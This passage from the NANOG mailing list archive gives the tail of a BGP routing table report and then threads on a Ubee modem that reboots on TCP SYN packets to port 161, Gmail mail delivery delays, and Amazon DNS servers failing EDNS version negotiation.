and 90 /24s ARIN AS Blocks 1-1876, 1902-2042, 2044-2046, 2048-2106 (pre-ERX allocations) 2138-2584, 2615-2772, 2823-2829, 2880-3153 3354-4607, 4865-5119, 5632-6655, 6912-7466 7723-8191, 10240-12287, 13312-15359, 16384-17407 18432-20479, 21504-23551, 25600-26591, 26624-27647, 29696-30719, 31744-33791 35840-36863, 39936-40959, 46080-47103 53248-55295, 62464-63487, 64198-64296, 393216-397212 ARIN Address Blocks 3/8, 4/8, 6/8, 7/8, 8/8, 9/8, 11/8, 12/8, 13/8, 15/8, 16/8, 17/8, 18/8, 19/8, 20/8, 21/8, 22/8, 23/8, 24/8, 26/8, 28/8, 29/8, 30/8, 32/8, 33/8, 34/8, 35/8, 38/8, 40/8, 44/8, 45/8, 47/8, 48/8, 50/8, 52/8, 53/8, 54/8, 55/8, 56/8, 57/8, 63/8, 64/8, 65/8, 66/8, 67/8, 68/8, 69/8, 70/8, 71/8, 72/8, 73/8, 74/8, 75/8, 76/8, 96/8, 97/8, 98/8, 99/8, 100/8, 104/8, 107/8, 108/8, 128/8, 129/8, 130/8, 131/8, 132/8, 134/8, 135/8, 136/8, 137/8, 138/8, 139/8, 140/8, 142/8, 143/8, 144/8, 146/8, 147/8, 148/8, 149/8, 152/8, 155/8, 156/8, 157/8, 158/8, 159/8, 160/8, 161/8, 162/8, 164/8, 165/8, 166/8, 167/8, 168/8, 169/8, 170/8, 172/8, 173/8, 174/8, 184/8, 192/8, 198/8, 199/8, 204/8, 205/8, 206/8, 207/8, 208/8, 209/8, 214/8, 215/8, 216/8, RIPE Region Analysis Summary ---------------------------- Prefixes being announced by RIPE Region ASes: 145299 Total RIPE prefixes after maximum aggregation: 71769 RIPE Deaggregation factor: 2.02 Prefixes being announced from the RIPE address blocks: 155434 Unique aggregates announced from the RIPE address blocks: 97057 RIPE Region origin ASes present in the Internet Routing Table: 18111 RIPE Prefixes per ASN: 8.58 RIPE Region origin ASes announcing only one prefix: 7831 RIPE Region transit ASes present in the Internet Routing Table: 3027 Average RIPE Region AS path length visible: 4.4 Max RIPE Region AS path length visible: 27 Number of RIPE region 32-bit ASNs visible in the Routing Table: 5023 Number of RIPE addresses announced to Internet: 707734656 Equivalent to 42 /8s, 47 /16s and 44 /24s RIPE AS Blocks 1877-1901, 2043, 2047, 2107-2136, 2585-2614 (pre-ERX allocations) 2773-2822, 2830-2879, 3154-3353, 5377-5631 6656-6911, 8192-9215, 12288-13311, 15360-16383 20480-21503, 24576-25599, 28672-29695 30720-31743, 33792-35839, 38912-39935 40960-45055, 47104-52223, 56320-58367 59392-61439, 61952-62463, 64396-64495 196608-207259 RIPE Address Blocks 2/8, 5/8, 25/8, 31/8, 37/8, 46/8, 51/8, 62/8, 77/8, 78/8, 79/8, 80/8, 81/8, 82/8, 83/8, 84/8, 85/8, 86/8, 87/8, 88/8, 89/8, 90/8, 91/8, 92/8, 93/8, 94/8, 95/8, 109/8, 141/8, 145/8, 151/8, 176/8, 178/8, 185/8, 188/8, 193/8, 194/8, 195/8, 212/8, 213/8, 217/8, LACNIC Region Analysis Summary ------------------------------ Prefixes being announced by LACNIC Region ASes: 61490 Total LACNIC prefixes after maximum aggregation: 12312 LACNIC Deaggregation factor: 4.99 Prefixes being announced from the LACNIC address blocks: 76803 Unique aggregates announced from the LACNIC address blocks: 37053 LACNIC Region origin ASes present in the Internet Routing Table: 2477 LACNIC Prefixes per ASN: 31.01 LACNIC Region origin ASes announcing only one prefix: 554 LACNIC Region transit ASes present in the Internet Routing Table: 583 Average LACNIC Region AS path length visible: 4.8 Max LACNIC Region AS path length visible: 22 Number of LACNIC region 32-bit ASNs visible in the Routing Table: 2744 Number of LACNIC addresses announced to Internet: 169965888 Equivalent to 10 /8s, 33 /16s and 121 /24s LACNIC AS Blocks 26592-26623, 27648-28671, 52224-53247, 61440-61951, 64099-64197, 262144-265628 + ERX transfers LACNIC Address Blocks 177/8, 179/8, 181/8, 186/8, 187/8, 189/8, 190/8, 191/8, 200/8, 201/8, AfriNIC Region Analysis Summary ------------------------------- Prefixes being announced by AfriNIC Region ASes: 14576 Total AfriNIC prefixes after maximum aggregation: 3291 AfriNIC Deaggregation factor: 4.43 Prefixes being announced from the AfriNIC address blocks: 16582 Unique aggregates announced from the AfriNIC address blocks: 6197 AfriNIC Region origin ASes present in the Internet Routing Table: 735 AfriNIC Prefixes per ASN: 22.56 AfriNIC Region origin ASes announcing only one prefix: 169 AfriNIC Region transit ASes present in the Internet Routing Table: 179 Average AfriNIC Region AS path length visible: 4.6 Max AfriNIC Region AS path length visible: 21 Number of AfriNIC region 32-bit ASNs visible in the Routing Table: 250 Number of AfriNIC addresses announced to Internet: 81149952 Equivalent to 4 /8s, 214 /16s and 64 /24s AfriNIC AS Blocks 36864-37887, 327680-328703 & ERX transfers AfriNIC Address Blocks 41/8, 102/8, 105/8, 154/8, 196/8, 197/8, APNIC Region per AS prefix count summary ---------------------------------------- ASN No of nets /20 equiv MaxAgg Description 4538 5542 4190 74 ERX-CERNET-BKB China Education and Rese 7545 3524 382 252 TPG-INTERNET-AP TPG Telecom Limited, AU 4766 3207 11146 1130 KIXS-AS-KR Korea Telecom, KR 17974 2943 904 78 TELKOMNET-AS2-AP PT Telekomunikasi Indo 9829 2680 1494 527 BSNL-NIB National Internet Backbone, IN 9808 2147 8781 42 CMNET-GD Guangdong Mobile Communication 4755 2054 429 226 TATACOMM-AS TATA Communications formerl 4808 1765 2293 532 CHINA169-BJ China Unicom Beijing Provin 24560 1533 507 218 AIRTELBROADBAND-AS-AP Bharti Airtel Ltd 38197 1520 94 288 SUNHK-DATA-AS-AP Sun Network (Hong Kong Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-APNIC ARIN Region per AS prefix count summary --------------------------------------- ASN No of nets /20 equiv MaxAgg Description 22773 3501 2964 144 ASN-CXA-ALL-CCI-22773-RDC - Cox Communi 6389 2202 3671 41 BELLSOUTH-NET-BLK - BellSouth.net Inc., 18566 2194 405 110 MEGAPATH5-US - MegaPath Corporation, US 20115 1935 1965 403 CHARTER-NET-HKY-NC - Charter Communicat 30036 1758 342 237 MEDIACOM-ENTERPRISE-BUSINESS - Mediacom 209 1704 5082 656 CENTURYLINK-US-LEGACY-QWEST - Qwest Com 6983 1689 849 228 ITCDELTA - Earthlink, Inc., US 16509 1394 2532 452 AMAZON-02 - Amazon.com, Inc., US 7018 1371 20093 1009 ATT-INTERNET4 - AT&T Services, Inc., US 701 1283 10703 692 UUNET - MCI Communications Services, In Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-ARIN RIPE Region per AS prefix count summary --------------------------------------- ASN No of nets /20 equiv MaxAgg Description 39891 3329 169 15 ALJAWWALSTC-AS , SA 20940 2778 1064 1974 AKAMAI-ASN1 , US 34984 1975 327 356 TELLCOM-AS , TR 12479 1320 1018 46 UNI2-AS , ES 8551 1212 377 46 BEZEQ-INTERNATIONAL-AS Bezeqint Interne 6849 1148 355 21 UKRTELNET , UA 13188 1095 98 63 BANKINFORM-AS , UA 8402 1019 544 15 CORBINA-AS Russia, RU 9198 926 352 25 KAZTELECOM-AS , KZ 6830 886 2752 465 LGI-UPC formerly known as UPC Broadband Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-RIPE LACNIC Region per AS prefix count summary ----------------------------------------- ASN No of nets /20 equiv MaxAgg Description 10620 3482 542 140 Telmex Colombia S.A., CO 8151 2262 3367 538 Uninet S.A. de C.V., MX 7303 1544 950 245 Telecom Argentina S.A., AR 6503 1395 437 55 Axtel, S.A.B. de C.V., MX 11830 1342 368 66 Instituto Costarricense de Electricidad 6147 1078 377 27 Telefonica del Peru S.A.A., PE 7738 994 1882 40 Telemar Norte Leste S.A., BR 3816 961 463 210 COLOMBIA TELECOMUNICACIONES S.A. ESP, C 11172 907 125 76 Alestra, S. de R.L. de C.V., MX 28573 898 2180 157 CLARO S.A., BR Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-LACNIC AfriNIC Region per AS prefix count summary ------------------------------------------ ASN No of nets /20 equiv MaxAgg Description 24863 1182 402 49 LINKdotNET-AS, EG 36903 682 343 120 MT-MPLS, MA 37611 652 48 2 Afrihost, ZA 36992 552 1373 25 ETISALAT-MISR, EG 8452 523 1472 15 TE-AS TE-AS, EG 37492 382 250 69 ORANGE-TN, TN 24835 348 610 16 RAYA-AS, EG 29571 299 37 12 CITelecom-AS, CI 15399 293 35 6 WANANCHI-KE, KE 2018 265 327 74 TENET-1, ZA Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-AFRINIC Global Per AS prefix count summary ---------------------------------- ASN No of nets /20 equiv MaxAgg Description 4538 5542 4190 74 ERX-CERNET-BKB China Education and Rese 7545 3524 382 252 TPG-INTERNET-AP TPG Telecom Limited, AU 22773 3501 2964 144 ASN-CXA-ALL-CCI-22773-RDC - Cox Communi 10620 3482 542 140 Telmex Colombia S.A., CO 39891 3329 169 15 ALJAWWALSTC-AS , SA 4766 3207 11146 1130 KIXS-AS-KR Korea Telecom, KR 17974 2943 904 78 TELKOMNET-AS2-AP PT Telekomunikasi Indo 20940 2778 1064 1974 AKAMAI-ASN1 , US 9829 2680 1494 527 BSNL-NIB National Internet Backbone, IN 8151 2262 3367 538 Uninet S.A. de C.V., MX Complete listing at http://thyme.rand.apnic.net/current/data-ASnet Global Per AS Maximum Aggr summary ---------------------------------- ASN No of nets Net Savings Description 22773 3501 3357 ASN-CXA-ALL-CCI-22773-RDC - Cox Communi 10620 3482 3342 Telmex Colombia S.A., CO 39891 3329 3314 ALJAWWALSTC-AS , SA 7545 3524 3272 TPG-INTERNET-AP TPG Telecom Limited, AU 17974 2943 2865 TELKOMNET-AS2-AP PT Telekomunikasi Indo 6389 2202 2161 BELLSOUTH-NET-BLK - BellSouth.net Inc., 9829 2680 2153 BSNL-NIB National Internet Backbone, IN 9808 2147 2105 CMNET-GD Guangdong Mobile Communication 18566 2194 2084 MEGAPATH5-US - MegaPath Corporation, US 4766 3207 2077 KIXS-AS-KR Korea Telecom, KR Complete listing at http://thyme.rand.apnic.net/current/data-CIDRnet List of Unregistered Origin ASNs (Global) ----------------------------------------- Bad AS Designation Network Transit AS Description 65001 PRIVATE 5.143.176.0/20 15468 KLGELECS-AS 38, Teatralnaya st 65001 PRIVATE 31.172.192.0/20 15468 KLGELECS-AS 38, Teatralnaya st 65001 PRIVATE 31.172.192.0/21 15468 KLGELECS-AS 38, Teatralnaya st 65001 PRIVATE 31.172.200.0/21 15468 KLGELECS-AS 38, Teatralnaya st 65001 PRIVATE 31.172.208.0/21 15468 KLGELECS-AS 38, Teatralnaya st 65001 PRIVATE 31.172.216.0/21 15468 KLGELECS-AS 38, Teatralnaya st 65000 PRIVATE 31.219.177.0/25 8966 ETISALAT-AS P.O. Box 1150, Dub 65000 PRIVATE 31.219.177.128/25 8966 ETISALAT-AS P.O. Box 1150, Dub 65512 PRIVATE 45.252.244.0/24 45899 VNPT-AS-VN VNPT Corp, VN 65512 PRIVATE 45.252.245.0/24 45899 VNPT-AS-VN VNPT Corp, VN Complete listing at http://thyme.rand.apnic.net/current/data-badAS Advertised Unallocated Addresses -------------------------------- Network Origin AS Description 23.249.144.0/20 40430 COLO4JAX-AS - colo4jax, LLC, US 27.100.7.0/24 56096 UNKNOWN 41.73.1.0/24 37004 -Reserved AS-, ZZ 41.73.2.0/24 37004 -Reserved AS-, ZZ 41.73.3.0/24 37004 -Reserved AS-, ZZ 41.73.4.0/24 37004 -Reserved AS-, ZZ 41.73.5.0/24 37004 -Reserved AS-, ZZ 41.73.6.0/24 37004 -Reserved AS-, ZZ 41.73.7.0/24 37004 -Reserved AS-, ZZ 41.73.8.0/24 37004 -Reserved AS-, ZZ Complete listing at http://thyme.rand.apnic.net/current/data-add-IANA Number of prefixes announced per prefix length (Global) ------------------------------------------------------- /1:0 /2:0 /3:0 /4:0 /5:0 /6:0 /7:0 /8:16 /9:13 /10:36 /11:101 /12:267 /13:515 /14:1052 /15:1770 /16:13147 /17:7803 /18:13006 /19:25321 /20:38521 /21:40083 /22:67395 /23:59236 /24:337145 /25:569 /26:578 /27:387 /28:53 /29:32 /30:14 /31:1 /32:34 Advertised prefixes smaller than registry allocations ----------------------------------------------------- ASN No of nets Total ann. Description 39891 2896 3329 ALJAWWALSTC-AS , SA 22773 2729 3501 ASN-CXA-ALL-CCI-22773-RDC - Cox Communi 18566 2086 2194 MEGAPATH5-US - MegaPath Corporation, US 30036 1573 1758 MEDIACOM-ENTERPRISE-BUSINESS - Mediacom 6389 1425 2202 BELLSOUTH-NET-BLK - BellSouth.net Inc., 10620 1391 3482 Telmex Colombia S.A., CO 6983 1340 1689 ITCDELTA - Earthlink, Inc., US 34984 1258 1975 TELLCOM-AS , TR 11492 1167 1264 CABLEONE - CABLE ONE, INC., US 6849 968 1148 UKRTELNET , UA Complete listing at http://thyme.rand.apnic.net/current/data-sXXas-nos Number of /24s announced per /8 block (Global) ---------------------------------------------- 1:1614 2:766 4:21 5:2159 6:31 8:989 12:1787 13:42 14:1751 15:45 16:2 17:92 18:126 20:50 22:1 23:1654 24:1795 27:2325 31:1787 32:77 33:4 35:5 36:307 37:2304 38:1252 39:36 40:94 41:2885 42:448 43:1840 44:44 45:2136 46:2557 47:86 49:1200 50:900 51:13 52:538 54:347 55:7 56:7 57:42 58:1643 59:1005 60:381 61:1813 62:1509 63:1914 64:4545 65:2186 66:4240 67:2205 68:1124 69:3270 70:1258 71:499 72:2012 74:2556 75:349 76:406 77:1382 78:1254 79:871 80:1305 81:1401 82:982 83:715 84:860 85:1593 86:484 87:1107 88:550 89:2077 90:213 91:6075 92:951 93:2313 94:2455 95:2489 96:529 97:339 98:944 99:42 100:78 101:1091 103:12057 104:2485 105:124 106:435 107:1330 108:654 109:2221 110:1282 111:1662 112:1046 113:1137 114:1039 115:1674 116:1641 117:1562 118:2034 119:1580 120:928 121:1116 122:2259 123:2010 124:1569 125:1836 128:653 129:431 130:412 131:1354 132:596 133:176 134:477 135:145 136:382 137:402 138:1855 139:423 140:585 141:456 142:674 143:944 144:734 145:163 146:935 147:657 148:1387 149:529 150:658 151:875 152:649 153:296 154:664 155:942 156:523 157:502 158:382 159:1154 160:511 161:729 162:2395 163:558 164:915 165:1079 166:321 167:1171 168:2059 169:664 170:1883 171:251 172:672 173:1685 174:755 175:674 176:1732 177:4016 178:2211 179:1166 180:2152 181:1823 182:2030 183:978 184:828 185:7255 186:3141 187:2097 188:2151 189:1736 190:7685 191:1260 192:9014 193:5718 194:4445 195:3851 196:1731 197:1142 198:5561 199:5751 200:7080 201:3635 202:10095 203:9830 204:4502 205:2737 206:2950 207:3080 208:4033 209:3870 210:3873 211:2072 212:2727 213:2330 214:865 215:71 216:5823 217:1993 218:799 219:610 220:1642 221:884 222:690 223:1281 End of report From mike-nanog at tiedyenetworks.com Fri Aug 26 18:11:21 2016 From: mike-nanog at tiedyenetworks.com (Mike) Date: Fri, 26 Aug 2016 11:11:21 -0700 Subject: Charter HFC Engineer? In-Reply-To: References: Message-ID: <2b15a790-64eb-b269-abb1-3343f72e516c@tiedyenetworks.com> On 08/24/2016 10:39 PM, Gabriel Kuri wrote: > I was able to confirm my Ubee > was susceptible to this bug and would reboot by simply telneting to IP > space on port 161 behind the modem. I figured my random reboots were > related to random people port scanning my IP space throughout the day. I > called support to let them know and got them to bump it up to their > manager, who then referred it to a "technical specialist" that ended up > blocking port 161 on my cable modem. Not to be unhelpful, but SNMP is a UDP protocol, you can't "telnet" to port 161 and be talking to the snmp deamon on the device because it's not listening for that. If you do get a connection, there's really something wrong.... -- Mike Ireton WillitsOnline LLC From jay at west.net Fri Aug 26 19:03:03 2016 From: jay at west.net (Jay Hennigan) Date: Fri, 26 Aug 2016 12:03:03 -0700 Subject: Managed global low latency network with any to any connectivity In-Reply-To: References: Message-ID: On 8/24/16 8:13 AM, Arqam Gadit wrote: > Hello guys, > > I am looking for a global network with: > > - lowest possible latency > - lowest possible jitter (packet loss and latency variation) > - lowest possible monetary cost You asked for: - Fast - Good - Cheap Sorry, but you're only allowed to choose two. -- Jay Hennigan - CCIE #7880 - Network Engineering - jay at impulse.net Impulse Internet Service - http://www.impulse.net/ Your local telephone and internet company - 805 884-6323 - WB6RDV From nate at dopedesign.com Thu Aug 25 20:10:14 2016 From: nate at dopedesign.com (Nate Metheny) Date: Thu, 25 Aug 2016 14:10:14 -0600 Subject: Why the internal network delays, Gmail? Message-ID: Help (and hi)! I work in higher education and we've been experiencing problems with Google delaying or queuing email for delivery to our domain. Here's some truncated email headers: ** Example 1: X-Received: by 10.237.55.65 with SMTP id i59mr10986018qtb.62.1472137448952; Thu, 25 Aug 2016 08:04:08 -0700 (PDT) Received: by mail-qt0-f175.google.com with SMTP id u25so27419242qtb.1 for <@***>; Thu, 25 Aug 2016 12:05:46 -0700 (PDT) ** Example 2: X-Received: by 10.36.1.75 with SMTP id 72mr5275579itk.40.1472130531887; Thu, 25 Aug 2016 06:08:51 -0700 (PDT) Received: by mail-it0-f48.google.com with SMTP id x131so289116132ite.0 for <@***>; Thu, 25 Aug 2016 11:50:42 -0700 (PDT) In both of these examples, these emails haven't even left Google's internal network yet; I'm getting blamed for these delays, however there is no delay in receiving these emails after they leave Google's network. Are other people having this same problem? I've tested delivery to my network from many outside sources and all SMTP requests go through without delay; this issue seems be exclusive to Google-hosted and Gmail accounts and domains. -- Nate ? nate at dopedesign.com From gkuri at ieee.org Fri Aug 26 18:27:49 2016 From: gkuri at ieee.org (Gabriel Kuri) Date: Fri, 26 Aug 2016 11:27:49 -0700 Subject: Charter HFC Engineer? In-Reply-To: <2b15a790-64eb-b269-abb1-3343f72e516c@tiedyenetworks.com> References: <2b15a790-64eb-b269-abb1-3343f72e516c@tiedyenetworks.com> Message-ID: Mike, SNMPv3 uses TCP. Also, I never said I had a daemon listening on port 161, the cable modem would simply reboot if it saw a TCP SYN packet destined to port 161 to IP address space sitting behind my cable modem. FYI - Charter engineers responded to me indicating it's a known bug with this Ubee modem and Ubee is working on a new revision of firmware to fix the bug. On Fri, Aug 26, 2016 at 11:11 AM, Mike wrote: > > > On 08/24/2016 10:39 PM, Gabriel Kuri wrote: > >> I was able to confirm my Ubee >> was susceptible to this bug and would reboot by simply telneting to IP >> space on port 161 behind the modem. I figured my random reboots were >> related to random people port scanning my IP space throughout the day. I >> called support to let them know and got them to bump it up to their >> manager, who then referred it to a "technical specialist" that ended up >> blocking port 161 on my cable modem. >> > Not to be unhelpful, but SNMP is a UDP protocol, you can't "telnet" to > port 161 and be talking to the snmp deamon on the device because it's not > listening for that. If you do get a connection, there's really something > wrong.... > > > -- > Mike Ireton > WillitsOnline LLC > > From johnl at iecc.com Fri Aug 26 20:12:23 2016 From: johnl at iecc.com (John Levine) Date: 26 Aug 2016 20:12:23 -0000 Subject: Why the internal network delays, Gmail? In-Reply-To: Message-ID: <20160826201223.42561.qmail@ary.lan> In article you write: >Help (and hi)! > >I work in higher education and we've been experiencing problems with Google >delaying or queuing email for delivery to our domain. This is a question for Google, not for nanog. Only they know how their network is set up and how their mail servers are managed. R's, John PS: Also keep in mind that sometimes free services are worth what you pay for them. From nate at dopedesign.com Fri Aug 26 20:46:27 2016 From: nate at dopedesign.com (Nate Metheny) Date: Fri, 26 Aug 2016 14:46:27 -0600 Subject: Why the internal network delays, Gmail? In-Reply-To: References: <20160826201223.42561.qmail@ary.lan> Message-ID: ??Thanks, John. I was in contact with Google and after some convincing and detailed header information, they acknowledged that they are having internal MX issues and assure me that they will deal with the issue promptly. Initially they did not even acknowledge that there was a problem, so it took several tiers of support people to finally see the issue. I look forward to the ongoing exchanges on the list. On Fri, Aug 26, 2016 at 2:45 PM, Nate Metheny wrote: > Thanks, John. > > I was in contact with Google and after some convincing and detailed header > information, they acknowledged that they are having internal MX issues and > assure me that they will deal with the issue promptly. > > Initially they did not even acknowledge that there was a problem, so it > took several tiers of support people to finally see the issue. > > I look forward to the ongoing exchanges on the list. > > On Fri, Aug 26, 2016 at 2:12 PM, John Levine wrote: > >> In article > gmail.com> you write: >> >Help (and hi)! >> > >> >I work in higher education and we've been experiencing problems with >> Google >> >delaying or queuing email for delivery to our domain. >> >> This is a question for Google, not for nanog. Only they know how their >> network >> is set up and how their mail servers are managed. >> >> R's, >> John >> >> PS: Also keep in mind that sometimes free services are worth what you pay >> for them. >> >> > > > -- > > Nate Metheny > natemetheny at gmail.com > -- Nate Metheny natemetheny at gmail.com From mel at beckman.org Fri Aug 26 20:53:05 2016 From: mel at beckman.org (Mel Beckman) Date: Fri, 26 Aug 2016 20:53:05 +0000 Subject: Why the internal network delays, Gmail? In-Reply-To: <20160826201223.42561.qmail@ary.lan> References: , <20160826201223.42561.qmail@ary.lan> Message-ID: <13354888-4527-4A83-AA15-904E5B45C34E@beckman.org> John, With all due respect, it's S.O.P. for Nanogen to ask the list if anyone else is experiencing a particular problem with some carrier or another. So Nate's question is totally appropriate for this list. I know I've solved several problems by airing them here and getting insight from other list members. -mel beckman > On Aug 26, 2016, at 4:13 PM, John Levine wrote: > > In article you write: >> Help (and hi)! >> >> I work in higher education and we've been experiencing problems with Google >> delaying or queuing email for delivery to our domain. > > This is a question for Google, not for nanog. Only they know how their network > is set up and how their mail servers are managed. > > R's, > John > > PS: Also keep in mind that sometimes free services are worth what you pay for them. > From jeffg at opennms.org Fri Aug 26 21:28:19 2016 From: jeffg at opennms.org (Jeff Gehlbach) Date: Fri, 26 Aug 2016 17:28:19 -0400 Subject: Charter HFC Engineer? In-Reply-To: References: <2b15a790-64eb-b269-abb1-3343f72e516c@tiedyenetworks.com> Message-ID: <16b0b037-b147-daa7-02bd-1c41592f2607@opennms.org> On 08/26/2016 02:27 PM, Gabriel Kuri wrote: > SNMPv3 uses TCP. FWIW, TCP is one of many possible transports for SNMPv3. UDP is by far the commonest in my experience, though. > FYI - Charter engineers responded to me indicating it's a known bug with > this Ubee modem and Ubee is working on a new revision of firmware to fix > the bug. Ouch. I'll have to check whether the Ubee unit on my Comcast Business connection is similarly affected. SNMP-related bugs are a dime a dozen, but this one sounds really awful. -jeff -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From g at 1337.io Fri Aug 26 22:17:12 2016 From: g at 1337.io (g at 1337.io) Date: Fri, 26 Aug 2016 15:17:12 -0700 Subject: Can someone from Amazon please answer. In-Reply-To: <20160823233710.8DC3A5206AD7@rock.dv.isc.org> References: <20160823233710.8DC3A5206AD7@rock.dv.isc.org> Message-ID: I would love to hear Amazon's response to this very question! On 8/23/16 4:37 PM, Mark Andrews wrote: > I'm curious. What are you trying to achieve by blocking EDNS version > negotiation? Is it really too hard to return BADVERS to a EDNS > query with version != 0 along with the version of EDNS you support > in the version field? Are you deliberately trying to prevent the > IETF from deciding to bump the EDNS version in the future? Do you > have firewalls that have this behaviour hard coded? Do you even > test for RFC compliance? > > Mark > > lostoncampus.com.au. @205.251.195.156 (ns-924.awsdns-51.net.): dns=ok edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > lostoncampus.com.au. @205.251.192.78 (ns-78.awsdns-09.com.): dns=ok edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > lostoncampus.com.au. @205.251.196.198 (ns-1222.awsdns-24.org.): dns=ok edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > lostoncampus.com.au. @205.251.199.20 (ns-1812.awsdns-34.co.uk.): dns=ok edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > From josh at kyneticwifi.com Fri Aug 26 22:33:27 2016 From: josh at kyneticwifi.com (Josh Reynolds) Date: Fri, 26 Aug 2016 17:33:27 -0500 Subject: Can someone from Amazon please answer. In-Reply-To: <20160823233710.8DC3A5206AD7@rock.dv.isc.org> References: <20160823233710.8DC3A5206AD7@rock.dv.isc.org> Message-ID: Just looking at the RFC... ----- VERSION Indicates the implementation level of the setter. Full conformance with this specification is indicated by version '0'. Requestors are encouraged to set this to the lowest implemented level capable of expressing a transaction, to minimise the responder and network load of discovering the greatest common implementation level between requestor and responder. A requestor's version numbering strategy MAY ideally be a run-time configuration option. If a responder does not implement the VERSION level of the request, then it MUST respond with RCODE=BADVERS. All responses MUST be limited in format to the VERSION level of the request, but the VERSION of each response SHOULD be the highest implementation level of the responder. In this way, a requestor will learn the implementation level of a responder as a side effect of every response, including error responses and including RCODE=BADVERS. ----- What am I missing, based on your output? On Aug 23, 2016 6:43 PM, "Mark Andrews" wrote: > > I'm curious. What are you trying to achieve by blocking EDNS version > negotiation? Is it really too hard to return BADVERS to a EDNS > query with version != 0 along with the version of EDNS you support > in the version field? Are you deliberately trying to prevent the > IETF from deciding to bump the EDNS version in the future? Do you > have firewalls that have this behaviour hard coded? Do you even > test for RFC compliance? > > Mark > > lostoncampus.com.au. @205.251.195.156 (ns-924.awsdns-51.net.): dns=ok > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > lostoncampus.com.au. @205.251.192.78 (ns-78.awsdns-09.com.): dns=ok > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > lostoncampus.com.au. @205.251.196.198 (ns-1222.awsdns-24.org.): dns=ok > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > lostoncampus.com.au. @205.251.199.20 (ns-1812.awsdns-34.co.uk.): dns=ok > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > > -- > Mark Andrews, ISC > 1 Seymour St., Dundas Valley, NSW 2117, Australia > PHONE: +61 2 9871 4742 INTERNET: marka at isc.org > From blakjak at blakjak.net Fri Aug 26 23:16:21 2016 From: blakjak at blakjak.net (Mark Foster) Date: Sat, 27 Aug 2016 11:16:21 +1200 Subject: Why the internal network delays, Gmail? In-Reply-To: <13354888-4527-4A83-AA15-904E5B45C34E@beckman.org> References: <20160826201223.42561.qmail@ary.lan> <13354888-4527-4A83-AA15-904E5B45C34E@beckman.org> Message-ID: <36c4f1f5-68de-2fbb-e825-3f1afbb58a6a@blakjak.net> Hi Mel, There's another mailing list called 'mailop' which is probably more appropriate for email related problems, than NANOG. And in response to Nate: > I was in contact with Google and after some convincing and detailed header > information, they acknowledged that they are having internal MX issues and > assure me that they will deal with the issue promptly. > > Initially they did not even acknowledge that there was a problem, so it > took several tiers of support people to finally see the issue. > > I look forward to the ongoing exchanges on the list. Useful to know, but John is right - as cited, working through Google's support process, got somewhere. Further exchanges on NANOG are probably inappropriate. A group like 'mailop' probably has a higher care factor, however. (I would also note that email delays that are demonstratably outside of your network (as headers will show) are very easily painted as something beyond your control, and the nature of email is very much 'best effort', so anyone playing the blame game needs a reality check. Just because email exchanges 'are often' near-instantaneous, does not mean they always will be.) Mark. On 27/08/2016 8:53 a.m., Mel Beckman wrote: > John, > > With all due respect, it's S.O.P. for Nanogen to ask the list if anyone else is experiencing a particular problem with some carrier or another. So Nate's question is totally appropriate for this list. I know I've solved several problems by airing them here and getting insight from other list members. > > -mel beckman > *snip* From nate at dopedesign.com Fri Aug 26 23:31:59 2016 From: nate at dopedesign.com (Nate Metheny) Date: Fri, 26 Aug 2016 17:31:59 -0600 Subject: Why the internal network delays, Gmail? In-Reply-To: <36c4f1f5-68de-2fbb-e825-3f1afbb58a6a@blakjak.net> References: <20160826201223.42561.qmail@ary.lan> <13354888-4527-4A83-AA15-904E5B45C34E@beckman.org> <36c4f1f5-68de-2fbb-e825-3f1afbb58a6a@blakjak.net> Message-ID: I was working within the limits of what I had available. I apologize if people on the list consider a network and systems administrator reaching out to peers for assistance with a particular problem that is clearly network related is inappropriate for a network operations group list that may or may not have Google or Google affiliated employees or contractors on it. I will use more discretion in the future. -- Sent from a phone. Please excuse the brevity of this message and any typographical errors. On Aug 26, 2016 17:18, "Mark Foster" wrote: > Hi Mel, There's another mailing list called 'mailop' which is probably > more appropriate for email related problems, than NANOG. > > And in response to Nate: > > I was in contact with Google and after some convincing and detailed header >> information, they acknowledged that they are having internal MX issues and >> assure me that they will deal with the issue promptly. >> >> Initially they did not even acknowledge that there was a problem, so it >> took several tiers of support people to finally see the issue. >> >> I look forward to the ongoing exchanges on the list. >> > > Useful to know, but John is right - as cited, working through Google's > support process, got somewhere. > Further exchanges on NANOG are probably inappropriate. A group like > 'mailop' probably has a higher care factor, however. > > (I would also note that email delays that are demonstratably outside of > your network (as headers will show) are very easily painted as something > beyond your control, and the nature of email is very much 'best effort', so > anyone playing the blame game needs a reality check. Just because email > exchanges 'are often' near-instantaneous, does not mean they always will > be.) > > > Mark. > > > > On 27/08/2016 8:53 a.m., Mel Beckman wrote: > >> John, >> >> With all due respect, it's S.O.P. for Nanogen to ask the list if anyone >> else is experiencing a particular problem with some carrier or another. So >> Nate's question is totally appropriate for this list. I know I've solved >> several problems by airing them here and getting insight from other list >> members. >> >> -mel beckman >> >> *snip* > From marka at isc.org Fri Aug 26 23:53:10 2016 From: marka at isc.org (Mark Andrews) Date: Sat, 27 Aug 2016 09:53:10 +1000 Subject: Can someone from Amazon please answer. In-Reply-To: Your message of "Fri, 26 